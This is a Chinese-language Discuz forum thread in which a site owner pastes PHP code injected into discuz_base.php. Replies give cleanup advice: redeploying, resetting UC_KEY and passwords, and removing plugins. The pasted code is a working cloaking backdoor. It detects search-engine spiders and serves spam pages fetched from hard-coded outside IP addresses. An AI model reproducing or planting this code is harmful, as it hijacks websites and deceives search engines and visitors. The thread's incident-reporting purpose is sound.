·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
返回列表 发布新帖

source\class\discuz\discuz_base.php文件被修改了

478 4
发表于 2021-4-17 16:06:00 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
source\class\discuz\discuz_base.php文件被修改了,被加了代码,如下:
set_time_limit(30);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
function httpGet($url) {
  $ch = curl_init();

  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_HEADER, 0);

  $output = curl_exec($ch);

  curl_close($ch);

  return $output;
}
$filename1 = @end(explode('/', $url1));
function set_writeable($file_name)
{
    @chmod($file_name, 0755);
}
@chmod(__FILE__, 0755);
set_writeable($filename1);
define('url', $er['REQUEST_URI']);
define('ref', $er['HTTP_REFERER']);
define('ent', $er['HTTP_USER_AGENT']);
define('site', "http://155.159.254.236:9867");
define('road', "?/" .$er['HTTP_HOST'] . url);
define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');
define('area', $tr(url, ".xml") or $tr(url, ".doc") or $tr(url, ".pdf") or $tr(url, ".txt") or $tr(url, ".ppt") or $tr(url, ".pptx") or $tr(url, ".xls") or $tr(url, ".csv") or $tr(url, ".shtml") or $tr(url,".tacc")or $tr(url,".ga")or $tr(url,".gq")or $tr(url, ".xlsx") and $tr(url, "?"));
if (area && preg_match(regs, ref)) {
    echo file_get_contents('http://155.159.254.254:9368/sb.html');
    exit;
}
if (preg_match(regs, ent)) {
    if (area) {
        echo httpGet(site.road);
        exit;
    } else {
        echo httpGet("http://155.159.254.254:9368/u.php");
        ob_flush();
        flush();
    }
}
我要说一句 收起回复
创宇盾启航版免费网站防御网站加速服务

评论4

CrystαlLv.8 发表于 2021-4-17 16:06:54 | 查看全部
这个需要您自行清理环境,完了升级最新版本解决。
我要说一句 收起回复
独家记忆Lv.8 发表于 2021-4-17 16:07:51 | 查看全部
如果之前用的就是最新版本,一般都是底层环境有漏洞或者密码泄露,或者 Discuz! / UCenter 管理员密码 / UC_KEY 泄露导致的。
我要说一句 收起回复
CrystαlLv.8 发表于 2021-4-17 16:08:48 | 查看全部
烦死了,文件全都用官方替换了,密码也改了,这个月已经中招三次了,今天又发现index.php又被改了。
我要说一句 收起回复
CrystαlLv.8 发表于 2021-4-17 16:08:59 | 查看全部
1. 服务器是否沦陷了,建议重新部署一次,整个目录全面杀毒,只提取必要的部分部署,避免单独的后门文件。
2. 重新部署的时候建议使用比较新的 Linux 发行版,并正确配置写入权限。
3. 关闭掉乱七八糟的插件、模板,建议关闭卸载并删除文件,避免黑客通过后门进入。
4. UC_KEY 以及应用 AUTHKEY 建议都重置一次,避免黑客掌握这些。
5. 所有的管理员密码全部强制重置一次。
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.141.45.90,GMT+8, 2024-12-23 08:42 , Processed in 0.268961 second(s), 100 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表